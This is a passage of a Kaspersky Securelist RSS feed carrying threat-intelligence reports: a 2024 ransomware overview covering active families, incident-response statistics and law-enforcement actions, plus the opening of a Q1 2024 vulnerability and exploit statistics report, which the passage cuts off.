194. <p>As always, we would like to note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.</p>
195. <p><em>Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or other-language-speaking, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information that we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.</em></p>
196. ]]></content:encoded>
198. <wfw:commentRss>https://securelist.com/apt-trends-report-q1-2024/112473/feed/</wfw:commentRss>
199. <slash:comments>0</slash:comments>
202. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
203. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
204. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
205. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
206. </item>
207. <item>
208. <title>State of ransomware in 2024</title>
209. <link>https://securelist.com/state-of-ransomware-2023/112590/</link>
210. <comments>https://securelist.com/state-of-ransomware-2023/112590/#respond</comments>
212. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
213. <pubDate>Wed, 08 May 2024 10:00:40 +0000</pubDate>
214. <category><![CDATA[Publications]]></category>
215. <category><![CDATA[Cybercrime Legislation]]></category>
216. <category><![CDATA[Data Encryption]]></category>
217. <category><![CDATA[LockBit]]></category>
218. <category><![CDATA[Ransomware]]></category>
219. <category><![CDATA[Financial threats]]></category>
220. <category><![CDATA[Windows malware]]></category>
221. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112590</guid>
222.  
223. <description><![CDATA[As Anti-Ransomware Day approaches, Kaspersky shares insights into the ransomware threat landscape and trends in 2023, and recent anti-ransomware activities by governments and law enforcement.]]></description>
224. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://securelist.com/modern-ransomware-groups-ttps/106824/" target="_blank" rel="noopener">Ransomware</a> attacks continue to be one of the biggest contemporary cybersecurity threats, affecting organizations and individuals alike on a global scale. From high-profile breaches in healthcare and industrial sectors – compromising huge volumes of sensitive data or halting production entirely – to attacks on small businesses that have become relatively easy targets, ransomware actors are expanding their sphere of influence. As we approach International Anti-Ransomware Day, we have analyzed the major ransomware events and trends. In this report, we share our observations, research, and statistics to shed light on the evolving ransomware threat landscape and its implications for cybersecurity.</p>
225. <h2 id="ransomware-landscape-rise-in-targeted-groups-and-attacks">Ransomware landscape: rise in targeted groups and attacks</h2>
226. <p>Kaspersky collected data on targeted ransomware groups and their attacks from multiple relevant public sources, for the years 2022 and 2023, filtered and validated it. The research reveals a 30% global increase in the number of targeted ransomware groups compared to 2022, with the number of known victims of their attacks rising by a staggering 71%.</p>
227. <p>Unlike random attacks, these targeted groups focus on governments, high-profile organizations, or specific individuals within an organization. Moreover, most of them distribute their malware under the Ransomware-as-a-Service (RaaS) model, which involves a number of smaller groups (called affiliates) getting access to the ransomware for a subscription fee or a portion of the ransom. In the graph below, you can see the ransomware families that were most active in 2023.</p>
228. <div id="attachment_112592" style="width: 967px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112592" class="size-full wp-image-112592" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" alt="Most active ransomware families by number of victims, 2023" width="957" height="560" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png 957w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-768x449.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-598x350.png 598w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-740x433.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-479x280.png 479w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-800x468.png 800w" sizes="(max-width: 957px) 100vw, 957px" /></a><p id="caption-attachment-112592" class="wp-caption-text">Most active ransomware families by number of victims, 2023</p></div>
229. <p>The ransomware most frequently encountered in organizations&#8217; systems in 2023 was <a href="https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/" target="_blank" rel="noopener">Lockbit 3.0</a>. The reason for its remarkable activity may be its builder leak in 2022. That led to various independent groups using the builder to create custom ransomware variants, which they then used to target organizations all over the world. The group itself also has a large affiliate network. Second was <a href="https://securelist.com/a-bad-luck-blackcat/106254/" target="_blank" rel="noopener">BlackCat/ALPHV</a>, which first appeared in December 2021. In December 2023, the FBI, together with other law enforcement agencies, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">disrupted</a> BlackCat&#8217;s operations and seized several websites of the group. However, immediately after the operation, BlackCat <a href="https://therecord.media/alphv-blackcat-ransomware-seized-sites-onion-tor-darkweb-fbi" target="_blank" rel="noopener">stated</a> that it had &#8220;unseized&#8221; at least some of the sites. The US Department of State <a href="https://www.state.gov/u-s-department-of-state-announces-reward-offers-for-criminal-associates-of-the-alphv-blackcat-ransomware-variant/" target="_blank" rel="noopener">offers</a> a 10 million bounty for the group&#8217;s associates. The third most active ransomware in 2023 was <a href="https://thehipaaetool.com/lessons-from-the-moveit-data-breach/" target="_blank" rel="noopener">Cl0p</a>. This group managed to breach managed the file transfer system MoveIt to get to its customers&#8217; data. According to New Zealand security firm Emsisoft, as of December 2023, this breach had affected over 2500 organizations.</p>
230. <h3 id="other-notable-ransomware-variants">Other notable ransomware variants</h3>
231. <p>In our threat research practice, among the threats we analyze are various ransomware samples. This section shares brief descriptions of several noteworthy families that, although not being the most active in 2023, are interesting in some way or another.</p>
232. <ul>
233. <li><strong>BlackHunt:</strong> Detected in late 2022 and updated in 2023, BlackHunt targets global victims using a C++ executable, which is based on Conti ransomware source code. It utilizes customizable attack vectors, including deceptive tactics like a fake Windows Update screen displayed to mask the file encryption process, and employs security measures for testing purposes, such as checking for &#8220;Vaccine.txt&#8221; before executing. If the malware author wants to test the executable without encrypting their own files, they create a Vaccine.txt file. If the malware finds this file in the system, it doesn&#8217;t proceed with encryption.</li>
234. <li><strong>Rhysida:</strong> Emerging in May 2023, Rhysida is a new RaaS operation initially targeting <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#rhysida" target="_blank" rel="noopener">Windows</a> but later <a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-rhysida" target="_blank" rel="noopener">expanding to Linux</a>. Both versions use AES and RSA algorithms for file encryption, and the ChaCha stream cipher in the key generation process. The ransomware also implements token-based access to its hidden service for enhanced secrecy.</li>
235. <li><strong>Akira:</strong> A compact C++ ransomware compatible with both Windows and Linux, <a href="https://securelist.com/crimeware-report-fakesg-akira-amos/111483/#akira" target="_blank" rel="noopener">Akira</a> has impacted over 60 organizations across various sectors. It employs a single key for encryption, and featured an encryption flaw in early versions, which made file decryption possible without the ransomware operators&#8217; knowledge. However, this flaw was fixed in recent variants, which are not decryptable at the time of writing this report. For victim communication, Akira utilizes a minimalistic JQuery Terminal-based hidden service.</li>
236. <li><strong>Mallox:</strong> Also known as Fargo and TargetCompany, Mallox has been wreaking havoc since its appearance in May 2021. With an increase in attacks in 2023 and nearly 500 identified samples, it continues to evolve with frequent updates and an active affiliate program as of 2024. Operating through both clearnet and TOR servers, Mallox targets internet-facing MS SQL and PostgreSQL servers and spreads through malicious attachments. The most affected countries include Brazil, Vietnam, China, Saudi Arabia, and India.</li>
237. <li><strong>3AM:</strong> A new RaaS variant, 3AM features a sophisticated command-line interface, and an &#8220;access key&#8221; feature for protection against automatic sandbox execution: to be executed, the ransomware requires an access key. As is the case with most human-operated ransomware, 3AM affiliates get an initial foothold in the target infrastructure using Cobalt Strike. In Cobalt Strike, they use the watermark option, which allows the attackers to uniquely identify beacon traffic associated with a specific Cobalt Strike team server. This may suggest that 3AM affiliates share access to the target with other ransomware groups, and use the watermark to separate their traffic from the others. The ransomware employs efficient file-processing techniques, such as reverse traversal (processing strings from the end to quickly identify file paths and extensions) and integration with Windows API, and terminates various processes before encryption to complicate recovery efforts. Communication with victims is through a TOR-based hidden service, though with operational security misconfigurations such as real IP exposure.</li>
238. </ul>
239. <h2 id="trends-observed-in-our-incident-response-practice">Trends observed in our incident response practice</h2>
240. <p>This section contains trends and statistics based on the incidents our incident response service dealt with in 2023. The figures in this section may differ from those obtained from public sources, because they don&#8217;t cover all ransomware-related incidents that occurred last year.</p>
241. <p>According to our incident response team, in 2023, every third incident (33.3%) was related to ransomware, which remained the primary threat to all organizations, whatever sector of economy or industry they belonged to.</p>
242. <p>Another important trend observed in 2023: attacks via contractors and service providers, including IT services, became one of the top three attack vectors for the first time. This approach facilitates large-scale attacks with less effort, often going undetected until data leaks or encrypted data are discovered. If speaking about ransomware, trusted relationship attacks were among four of the main initial infection vectors. Another three were: compromise of internet-facing applications, which accounted for 50% of all ransomware attacks; compromised credentials (40%), of which 15% were obtained as a result of brute force attacks; and phishing.</p>
243. <p>Among the ransomware families most frequently encountered in our incident response practice in 2023 were Lockbit (27.78%), BlackCat (12.96%), Phobos (9.26%), and Zeppelin (9.26%). Most of the data encryption attacks ended within a day (43.48%) or days (32.61%). The rest lasted for weeks (13.04%), while only 10.87% lasted for more than a month. Practically all the long ransomware attacks (those lasting weeks and months), in addition to data encryption, also featured data leakage.</p>
244. <h3 id="ransomware-groups-tactics-and-techniques">Ransomware groups&#8217; tactics and techniques</h3>
245. <p>Ransomware groups have continued to employ previously identified strategies for intrusion, utilizing similar tools and techniques. Adversaries have targeted internet-facing applications vulnerable to remote command execution (RCE), such as those supported by vulnerable versions of log4j. Exploiting vulnerabilities in these applications, adversaries have gained unauthorized access and compromised infrastructures.</p>
246. <p>Once exploitation is confirmed, adversaries typically proceed by manipulating local privileged accounts responsible for application execution. They execute commands to modify user passwords and upload a set of tools, such as Meterpreter and Mimikatz, to the compromised system. By executing Meterpreter and creating or modifying system processes, adversaries gain additional access and establish persistence on the compromised system.</p>
247. <p>In some instances, adversaries exploit vulnerabilities in public-facing applications within the organization&#8217;s infrastructure and utilize tools like BloodHound and Impacket for lateral movement within networks and gaining knowledge of the target infrastructure. However, to evade endpoint controls, they also have adopted different techniques, such as using the Windows Command Shell to collect event logs and extract valid usernames.</p>
248. <p>Additionally, adversaries leverage native Windows SSH commands for command and control (C2) communications and data exfiltration. After identifying paths to reach remote systems with internet access, they configure SSH backdoors and establish reverse tunneling for data exchange.</p>
249. <p>Overall, ransomware groups demonstrate a sophisticated understanding of network vulnerabilities and utilize a variety of tools and techniques to achieve their objectives. The use of well-known security tools, exploitation of vulnerabilities in public-facing applications, and the use of native Windows commands highlight the need for robust cybersecurity measures to defend against ransomware attacks and domain takeovers.</p>
250. <h2 id="ransomware-becoming-a-matter-of-national-and-international-security">Ransomware: becoming a matter of national and international security</h2>
251. <p>Over the past few years, the impact of ransomware attacks on public and private organizations has escalated to the point of threatening national security. This growing threat has led to ransomware being highlighted in national cybersecurity strategies, annual reports from cybersecurity regulators, and intergovernmental discussions at forums like the <a href="https://estatements.unmeetings.org/estatements/12.1255/20231211100000000/Esyr02c2qUjw/lszA98NeSJ5l_en.pdf" target="_blank" rel="noopener">UN Open-ended Working Group (OEWG) on cybersecurity</a>. The frequency and disruptive character of ransomware attacks has become unsustainable for governments, prompting them to pool resources and develop both national and multi-country initiatives to combat ransomware groups.</p>
252. <p>One notable initiative is the formation in 2021 of <a href="https://counter-ransomware.org/" target="_blank" rel="noopener">the international Counter Ransomware Initiative (CRI)</a>, which brings together 49 countries and INTERPOL. Through the CRI, there has been a concerted effort to share cybersecurity information, disrupt attackers&#8217; operations, and tackle the financial mechanisms that fuel ransomware attacks. CRI members have also endorsed a statement advocating against ransom payments by institutions under national government authority, signaling the need for a new global norm and standard around ransomware payments. Countries like Singapore and the United Kingdom have played pivotal roles within the CRI, focusing on understanding the ransomware payment ecosystem and advocating for policies that counter ransomware financing.</p>
253. <p>Legislative measures and policy actions are central to the fight against ransomware. In the United States, legislation like <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/cyber-incident-reporting-critical-infrastructure-act-2022-circia" target="_blank" rel="noopener">the Cyber Incident Reporting for Critical Infrastructure Act of 2022</a> aims to enhance incident reporting and resilience against attacks. In early 2023, France implemented a <a href="https://www.legifrance.gouv.fr/jorf/article_jo/JORFARTI000047046789" target="_blank" rel="noopener">law</a> that conditioned insurance coverage on the prompt reporting of cybersecurity incidents.</p>
254. <p>State agencies reporting on ransomware indicates that fighting against this threat is a priority for authorities. In its latest <a href="https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html" target="_blank" rel="noopener">IT Security Report 2023, the BSI (Germany)</a> identifies ransomware as the biggest cybersecurity threat to Germany, noting the shift from &#8220;big game hunting&#8221; to targeting smaller companies and municipal administrations.</p>
255. <p>Last but not least, law enforcement agencies around the globe are joining forces in operations aimed at dismantling ransomware networks. In 2023, international operations seized infrastructures of such ransomware groups as <a href="https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant" target="_blank" rel="noopener">Hive</a>, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">BlackCat</a>, and <a href="https://www.europol.europa.eu/media-press/newsroom/news/ragnar-locker-ransomware-gang-taken-down-international-police-swoop" target="_blank" rel="noopener">Ragnar</a>. Early 2024 saw Operation Cronos <a href="https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation" target="_blank" rel="noopener">disrupt</a> Lockbit and get access to their decryption keys, and in May 2024, the group&#8217;s leader <a href="https://nationalcrimeagency.gov.uk/news/lockbit-leader-unmasked-and-sanctioned" target="_blank" rel="noopener">was unmasked and sanctioned</a>. Although cybercriminals usually rebuild their infrastructure afterwards, these efforts at the very least make ransomware maintenance much more expensive and shorten their income by decrypting their victims for free. These and other efforts underscore a comprehensive approach to fighting ransomware. By combining international cooperation, legislative action, and financial oversight, countries aim to mitigate the global threat and impact of ransomware attacks effectively.</p>
256. <h2 id="ransomware-what-to-expect-in-2024">Ransomware – what to expect in 2024</h2>
257. <p>As we look ahead to 2024, we observe a significant shift in the ransomware ecosystem. While many prominent ransomware gangs have disappeared, smaller and more elusive groups are emerging. This rise can be attributed to leaked source code and tools from disbanded or deceased larger groups.</p>
258. <p>As officials discuss counter-ransomware measures and law authorities around the globe link up to combat cybercrime, ransomware operations are becoming increasingly fragmented. Larger, more coordinated groups are breaking down into smaller fractions, making it more challenging for law enforcement to target them. Moreover, each of these smaller groups has less impact and is of less interest for law enforcement, thus having a reduced likelihood of being tracked and prosecuted, giving independent ransomware actors a higher chance of escaping arrest.</p>
259. <p>In conclusion, ransomware attacks remain a significant and evolving threat in the realm of cybersecurity. From high-profile breaches affecting critical sectors to attacks on small businesses, the impact of ransomware continues to expand. As we reflect on the state of ransomware, several key observations and trends emerge.</p>
260. <p>To mitigate the risk of ransomware attacks, individuals and organizations should prioritize cybersecurity measures.</p>
261. <ul>
262. <li>Use robust, properly-configured security solutions like <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a>.</li>
263. <li>Implement <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats.</li>
264. <li>Disable unused services and ports to minimize the attack surface.</li>
265. <li>Keep all systems and software up to date with regular updates and patches.</li>
266. <li>Conduct regular penetration tests and vulnerability scanning to identify and address vulnerabilities promptly.</li>
267. <li>Provide comprehensive cybersecurity training to employees to raise awareness of cyberthreats and best practices for mitigation.</li>
268. <li>Establish and maintain regular backups of critical data, and test backup and recovery procedures regularly.</li>
269. <li>Use <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> to keep track of the latest TTPs used by groups and adjust your detection mechanisms to catch these.</li>
270. <li>Pay special attention to any &#8220;new&#8221; software being run and installed on systems within your network (including legitimate software).</li>
271. </ul>
272. ]]></content:encoded>
274. <wfw:commentRss>https://securelist.com/state-of-ransomware-2023/112590/feed/</wfw:commentRss>
275. <slash:comments>0</slash:comments>
278. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-scaled.jpg" width="2672" height="1496"><media:keywords>full</media:keywords></media:content>
279. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-1024x573.jpg" width="1024" height="573"><media:keywords>large</media:keywords></media:content>
280. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-300x168.jpg" width="300" height="168"><media:keywords>medium</media:keywords></media:content>
281. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
282. </item>
283. <item>
284. <title>Exploits and vulnerabilities in Q1 2024</title>
285. <link>https://securelist.com/vulnerability-report-q1-2024/112554/</link>
286. <comments>https://securelist.com/vulnerability-report-q1-2024/112554/#respond</comments>
288. <dc:creator><![CDATA[Alexander Kolesnikov, Vitaly Morgunov]]></dc:creator>
289. <pubDate>Tue, 07 May 2024 10:00:39 +0000</pubDate>
290. <category><![CDATA[Publications]]></category>
291. <category><![CDATA[Backdoor]]></category>
292. <category><![CDATA[Browser]]></category>
293. <category><![CDATA[Linux]]></category>
294. <category><![CDATA[Microsoft Exchange]]></category>
295. <category><![CDATA[Microsoft Office]]></category>
296. <category><![CDATA[Microsoft Windows]]></category>
297. <category><![CDATA[Targeted attacks]]></category>
298. <category><![CDATA[Vulnerabilities]]></category>
299. <category><![CDATA[Vulnerabilities and exploits]]></category>
300. <category><![CDATA[Vulnerability Statistics]]></category>
301. <category><![CDATA[Vulnerabilities and exploits]]></category>
302. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112554</guid>
303.  
304. <description><![CDATA[The report provides vulnerability and exploit statistics, key trends, and analysis of interesting vulnerabilities discovered in Q1 2024.]]></description>
305. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We at Kaspersky continuously monitor the evolving cyberthreat landscape to ensure we respond promptly to emerging threats, equipping our products with detection logic and technology. Software vulnerabilities that threat actors can exploit or are already actively exploiting are a critical component of that landscape. In this report, we present a series of insightful statistical and analytical snapshots relating to the trends in the emergence of new vulnerabilities and exploits, as well as the most prevalent vulnerabilities being used by attackers. Additionally, we take a close look at several noteworthy vulnerabilities discovered in Q1 2024.</p>
306. <h2 id="statistics-on-registered-vulnerabilities">Statistics on registered vulnerabilities</h2>
307. <p>To facilitate the management of vulnerabilities, vendors can register these and assign CVE identifiers. All identifiers and related public information are published on <a href="https://cve.mitre.org" target="_blank" rel="noopener">https://cve.mitre.org</a> (at the time of writing, the site is in the process of migrating to a new domain, <a href="https://www.cve.org/" target="_blank" rel="noopener">https://www.cve.org/</a>). Although vendors often fail to register vulnerabilities, and the CVE list cannot be considered exhaustive, it does allow us to track certain trends. We analyzed data on registered software vulnerabilities and compared their quantities over the past five years.</p>
308. <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="interactive" data-title="01 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
309. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091108/01-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
310. <p>As the chart illustrates, the number of new vulnerabilities has been steadily increasing year over year. This can be attributed to several factors.</p>
311. <p>Firstly, the growing popularity of bug bounty platforms and vulnerability discovery competitions have provided a major impetus to research in the field. As a result, vulnerability discoveries have been on the rise. This also leads to more vendors registering the discovered vulnerabilities, resulting in a growing number of CVEs.</p>
312. <p>Secondly, companies developing popular software, operating systems, and programming languages are implementing more security solutions and new procedures that improve the performance of vulnerability monitoring in software. On the one hand, this leads to vulnerabilities being discovered more frequently; on the other, entire categories of vulnerabilities become obsolete. As a result, both threat actors and security researchers striving to stay ahead are actively searching for new types of vulnerabilities and creating automated services that allow for even more efficient detection.</p>
313. <p>Finally, new applications appear with time as existing ones get updates and become more complex, spawning new vulnerabilities. With the rapid pace of technological evolution, the number of discovered vulnerabilities is likely to continue to grow year after year.</p>
314. <p>It is important to note that different vulnerabilities pose different levels of security threats. In particular, some of them may be categorized as critical. We used the data in the list of registered CVEs and the results of internal reproducibility tests to calculate the share of critical vulnerabilities.</p>
315. <div class="js-infogram-embed" data-id="_/q1XSTSE9SXKud94bFufN" data-type="interactive" data-title="02 EN Vulnerability report graphs" style="min-height:;"></div>
316. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs and the percentage of critical CVEs in these, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091119/02-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
317. <p>As the chart shows, the growth in the number of critical vulnerabilities has been intermittent. In 2021 and 2022, the share of critical vulnerabilities among the total number was comparable, but it increased during the periods from 2019 through 2021 and from 2022 through 2023. The year 2023 was notable for a record number of critical vulnerabilities discovered in software. The percentage of critical vulnerabilities in the total number of registered ones remained high in Q1 2024. This once again emphasizes the importance of proper patch management and the need for security solutions capable of preventing vulnerability exploitation.</p>
318. <h2 id="exploitation-statistics">Exploitation statistics</h2>
319. <p>This section presents exploit statistics gathered from both public sources, such as registered CVEs, and our in-house telemetry.</p>
320. <p>An exploit is a program containing data or executable code that takes advantage of one or more software vulnerabilities on a local or remote computer for malicious purposes. Software vulnerabilities that allow attackers to gain control over the target user&#8217;s system are of the highest value to exploit developers.</p>
321. <p>Exploits can be created by malicious actors who sell their creations on underground forums or use them to their own ends. Additionally, enthusiasts, including participants of various bug bounty programs, develop exploits to stay ahead of adversaries and devise countermeasures.</p>
322. <div id="attachment_112556" style="width: 947px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112556" class="size-full wp-image-112556" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" alt="A dark web buy ad for zero- and one-day exploits" width="937" height="326" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png 937w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-768x267.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-740x257.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-805x280.png 805w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-800x278.png 800w" sizes="(max-width: 937px) 100vw, 937px" /></a><p id="caption-attachment-112556" class="wp-caption-text">A dark web buy ad for zero- and one-day exploits</p></div>
323. <h3 id="windows-and-linux-vulnerability-exploitation">Windows and Linux vulnerability exploitation</h3>
324. <p>The charts below show the trends in the number of Linux and Windows users protected by Kaspersky products who encountered vulnerability exploits in 2023 and Q1 2024. The statistics are based on data from the Kaspersky Security Network, provided by our users voluntarily.</p>
325. <div class="js-infogram-embed" data-id="_/zVTq4mF5zUc1VcatXACX" data-type="interactive" data-title="04 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
326. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Windows users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095107/04-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
327. <div class="js-infogram-embed" data-id="_/mqB1DB4dRydD21CtOwRd" data-type="interactive" data-title="03 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
328. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Linux users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095054/03-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
329. <p>As the charts demonstrate, the number of Windows users who experienced vulnerability exploitation remained roughly unchanged throughout 2023, whereas the number of affected Linux users increased steadily. It&#8217;s important to note that this doesn&#8217;t necessarily involve the same vulnerabilities in both cases. Some vulnerabilities quickly become obsolete, prompting threat actors to shift their focus to newer ones.</p>
330. <p>Let&#8217;s illustrate the changes in the popularity of certain vulnerabilities using the example of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38831" target="_blank" rel="noopener">CVE-2023-38831</a> vulnerability in WinRAR.</p>
331. <div class="js-infogram-embed" data-id="_/HLfi9KXTIUf4HlJj4Omw" data-type="interactive" data-title="05 EN Vulnerability report graphs" style="min-height:;"></div>
332. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The popularity dynamics of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38831" target="_blank" rel="noopener">CVE-2023-38831</a> vulnerability in WinRAR, September 2023 — March 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091129/05-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
333. <p>The chart reveals that the vulnerability was quite popular almost immediately after it was registered in September 2023 but then gradually declined in relevance as users installed patches. This is just further evidence that malicious actors tend to take an interest in vulnerabilities as long as the number of users who have installed a fix is relatively small.</p>
334. <h3 id="public-exploit-statistics">Public exploit statistics</h3>
335. <p>The availability of an exploit, especially when accessible on public platforms like GitHub, is a key criterion in assessing the criticality of a vulnerability. We analyzed data on publicly available exploits for registered vulnerabilities.</p>
336. <div class="js-infogram-embed" data-id="_/da7IeILEkOtbflqBLPR6" data-type="interactive" data-title="06 EN Vulnerability report graphs" style="min-height:;"></div>
337. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of vulnerabilities and the percentage of those that have an exploit, 2019 — 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091139/06-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
338. <p>The statistics reveal an increase in the total number of exploits, encompassing both ready for use and raw PoCs. The latter may be unstable but they demonstrate the possibility of exploiting the vulnerability and hold potential for future refinement. It&#8217;s worth noting that malicious actors seek both new exploits and modifications to existing ones, such as optimization for compatibility with multiple operating systems, integration of new data processing methods, and stability enhancements.</p>
